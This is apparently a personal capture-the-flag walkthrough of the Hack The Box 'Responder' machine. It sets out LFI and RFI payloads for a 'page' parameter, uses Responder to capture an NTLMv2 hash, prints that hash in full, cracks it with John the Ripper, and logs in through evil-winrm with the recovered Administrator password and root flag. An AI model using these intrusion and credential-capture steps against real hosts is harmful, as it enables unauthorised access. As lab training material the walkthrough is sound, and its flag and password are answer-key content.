Respond

Target Information:

• IP: 10.129.113.205
• TCP Port 80: Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)

==============================================================

Task #1: When visiting the web service using the IP address, what is the domain that we are being redirected to?

• A: unika.htb
• To visit:
  • Edit /etc/hosts to include 10.129.113.205 unika.htb
  • This allows us to access a custom TLD

Task #2: Which scripting language is being used on the server to generate webpages?

• A: PHP

• nmap 10.129.113.205 -sC -sV -T4 -Pn -p-

  $ nmap 10.129.113.205 -sC -sV -T4 -Pn -p-
  Starting Nmap 7.80 ( https://nmap.org ) at 2022-12-13 14:46 EST
  Nmap scan report for unika.htb (10.129.113.205)
  Host is up (0.11s latency).
  Not shown: 65532 filtered ports
  PORT     STATE SERVICE    VERSION
  80/tcp   open  http       Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
  |_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
  |_http-title: Unika
  5985/tcp open  http       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  |_http-server-header: Microsoft-HTTPAPI/2.0
  |_http-title: Not Found
  7680/tcp open  pando-pub?
  Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
  

Task #3: What is the name of the URL parameter which is used to load different language versions of the webpage?

• A: page
• gobuster dir --url 10.129.113.205 --wordlist common.txt
• DE example: http://unika.htb/index.php?page=german.html

Task #4: Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

• A: ../../../../../../../../windows/system32/drivers/etc/hosts
• Check if LFI works:
  • http://unika.htb/index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts

Task #5: Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

• A: //10.10.14.6/somefile

Task #6: What does NTLM stand for?

• A: New Technology LAN Manager

Task #7: Which flag do we use in the Responder utility to specify the network interface?

• A: -I
• https://www.kali.org/tools/responder/
  • sudo git clone https://github.com/lgandx/Responder /opt/Responder
  • Add alias responder="python3 /opt/Responder/Responder.py" in ~/.bashrc, then source
  • pip3 install netifaces
  • sudo python3 /opt/Responder/Responder.py -I tun0
    • TODO: RESEARCH WHAT tun0 IS!

Task #8: There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john, but the full name is what?

• A: john the ripper

Task #9: What is the password for the administrator user?

• A:

• Use remote file inclusion from the Responder server IP:

  • Make sure responder is still running

  • Visit "http://unika.htb/index.php?page=//10.10.16.143/anything", which will capture the NTLM hash

    Administrator::RESPONDER:63ff936b9fdc75cb:DBE9D33020961DEF69B126BD7CE26720:01010000000000008034D7BB000FD9011E353DFAF6081B2A00000000020008005A004D005000500001001E00570049004E002D005100390052005A0034005500510043005A005100470004003400570049004E002D005100390052005A0034005500510043005A00510047002E005A004D00500050002E004C004F00430041004C00030014005A004D00500050002E004C004F00430041004C00050014005A004D00500050002E004C004F00430041004C00070008008034D7BB000FD901060004000200000008003000300000000000000001000000002000001465C479D5A200159384C019FB8E6AEE1BF77C342485E468A68AF6E605CA90440A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310036002E003100340033000000000000000000
    

• john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt !> badminton

Task #10: We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?

• A: 5985
• Info from the nmap scan from earlier; service is WimRM (source)
• Can exploit with evil-winrm
  • sudo apt install ruby rbenv ruby-dev
  • gem install evil-winrm

Submit root flag: ea81b7afddd03efaa0945333ed147fac

• evil-winrm -u Administrator -p 'badminton' -i 10.129.113.205
• cat C:/Users/mike/Desktop/flag.txt

---

Tags

1. very easy (Private)
2. WimRM (Private)
3. web (Private)
4. responder (Private)
5. LFI (Private)
6. RFI (Private)
7. RCE (Private)